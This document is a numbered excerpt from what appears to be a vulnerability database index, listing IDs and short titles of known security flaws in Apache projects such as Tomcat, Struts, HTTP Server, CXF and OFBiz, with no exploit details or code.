11572| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
11573| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
11574| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
11575| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
11576| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
11577| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
11578| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
11579| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
11580| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
11581| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
11582| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
11583| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
11584| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
11585| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
11586| [94279] Apache Qpid CA Certificate Validation Bypass
11587| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
11588| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
11589| [94042] Apache Axis JAX-WS Java Unspecified Exposure
11590| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
11591| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
11592| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
11593| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
11594| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
11595| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
11596| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
11597| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
11598| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
11599| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
11600| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
11601| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
11602| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
11603| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
11604| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
11605| [93541] Apache Solr json.wrf Callback XSS
11606| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
11607| [93521] Apache jUDDI Security API Token Session Persistence Weakness
11608| [93520] Apache CloudStack Default SSL Key Weakness
11609| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
11610| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
11611| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
11612| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
11613| [93515] Apache HBase table.jsp name Parameter XSS
11614| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
11615| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
11616| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
11617| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
11618| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
11619| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
11620| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
11621| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
11622| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
11623| [93252] Apache Tomcat FORM Authenticator Session Fixation
11624| [93172] Apache Camel camel/endpoints/ Endpoint XSS
11625| [93171] Apache Sling HtmlResponse Error Message XSS
11626| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
11627| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
11628| [93168] Apache Click ErrorReport.java id Parameter XSS
11629| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
11630| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
11631| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
11632| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
11633| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
11634| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
11635| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
11636| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
11637| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
11638| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
11639| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
11640| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
11641| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
11642| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
11643| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
11644| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
11645| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
11646| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
11647| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
11648| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
11649| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
11650| [93144] Apache Solr Admin Command Execution CSRF
11651| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
11652| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
11653| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
11654| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
11655| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
11656| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
11657| [92748] Apache CloudStack VM Console Access Restriction Bypass
11658| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
11659| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
11660| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
11661| [92706] Apache ActiveMQ Debug Log Rendering XSS
11662| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
11663| [92270] Apache Tomcat Unspecified CSRF
11664| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
11665| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
11666| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
11667| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
11668| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
11669| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
11670| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
11671| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
11672| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
11673| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
11674| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
11675| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
11676| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
11677| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
11678| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
11679| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
11680| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
11681| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
11682| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
11683| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
11684| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
11685| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
11686| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
11687| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
11688| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
11689| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
11690| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
11691| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
11692| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
11693| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
11694| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
11695| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
11696| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
11697| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
11698| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
11699| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
11700| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
11701| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
11702| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
11703| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
11704| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
11705| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
11706| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
11707| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
11708| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
11709| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
11710| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
11711| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
11712| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
11713| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
11714| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
11715| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
11716| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
11717| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
11718| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
11719| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
11720| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
11721| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
11722| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
11723| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
11724| [86901] Apache Tomcat Error Message Path Disclosure
11725| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
11726| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
11727| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
11728| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
11729| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
11730| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
11731| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
11732| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
11733| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
11734| [85430] Apache mod_pagespeed Module Unspecified XSS
11735| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
11736| [85249] Apache Wicket Unspecified XSS
11737| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
11738| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
11739| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
11740| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
11741| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
11742| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
11743| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
11744| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
11745| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
11746| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
11747| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
11748| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
11749| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
11750| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
11751| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
11752| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
11753| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
11754| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
11755| [83339] Apache Roller Blogger Roll Unspecified XSS
11756| [83270] Apache Roller Unspecified Admin Action CSRF
11757| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
11758| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
11759| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
11760| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
11761| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
11762| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
11763| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
11764| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
11765| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
11766| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
11767| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
11768| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
11769| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
11770| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
11771| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
11772| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
11773| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
11774| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
11775| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
11776| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
11777| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
11778| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
11779| [80300] Apache Wicket wicket:pageMapName Parameter XSS
11780| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
11781| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
11782| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
11783| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
11784| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
11785| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
11786| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
11787| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
11788| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
11789| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
11790| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
11791| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
11792| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
11793| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
11794| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
11795| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
11796| [78331] Apache Tomcat Request Object Recycling Information Disclosure
11797| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
11798| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
11799| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
11800| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
11801| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
11802| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
11803| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
11804| [77593] Apache Struts Conversion Error OGNL Expression Injection
11805| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
11806| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
11807| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
11808| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
11809| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
11810| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
11811| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
11812| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
11813| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
11814| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
11815| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
11816| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
11817| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
11818| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
11819| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
11820| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
11821| [74725] Apache Wicket Multi Window Support Unspecified XSS
11822| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
11823| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
11824| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
11825| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
11826| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
11827| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
11828| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
11829| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
11830| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
11831| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
11832| [73644] Apache XML Security Signature Key Parsing Overflow DoS
11833| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
11834| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
11835| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
11836| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
11837| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
11838| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
11839| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
11840| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
11841| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
11842| [73154] Apache Archiva Multiple Unspecified CSRF
11843| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
11844| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
11845| [72238] Apache Struts Action / Method Names <
11846| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
11847| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
11848| [71557] Apache Tomcat HTML Manager Multiple XSS
11849| [71075] Apache Archiva User Management Page XSS
11850| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
11851| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
11852| [70924] Apache Continuum Multiple Admin Function CSRF
11853| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
11854| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
11855| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
11856| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
11857| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
11858| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
11859| [69520] Apache Archiva Administrator Credential Manipulation CSRF
11860| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
11861| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
11862| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
11863| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
11864| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
11865| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
11866| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
11867| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
11868| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
11869| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
11870| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
11871| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
11872| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
11873| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
11874| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
11875| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
11876| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
11877| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
11878| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
11879| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
11880| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
11881| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
11882| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
11883| [65054] Apache ActiveMQ Jetty Error Handler XSS
11884| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
11885| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
11886| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
11887| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
11888| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
11889| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
11890| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
11891| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
11892| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
11893| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
11894| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
11895| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
11896| [63895] Apache HTTP Server mod_headers Unspecified Issue
11897| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
11898| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
11899| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
11900| [63140] Apache Thrift Service Malformed Data Remote DoS
11901| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
11902| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
11903| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
11904| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
11905| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
11906| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
11907| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
11908| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
11909| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
11910| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
11911| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
11912| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
11913| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
11914| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
11915| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
11916| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
11917| [60678] Apache Roller Comment Email Notification Manipulation DoS
11918| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
11919| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
11920| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
11921| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
11922| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
11923| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
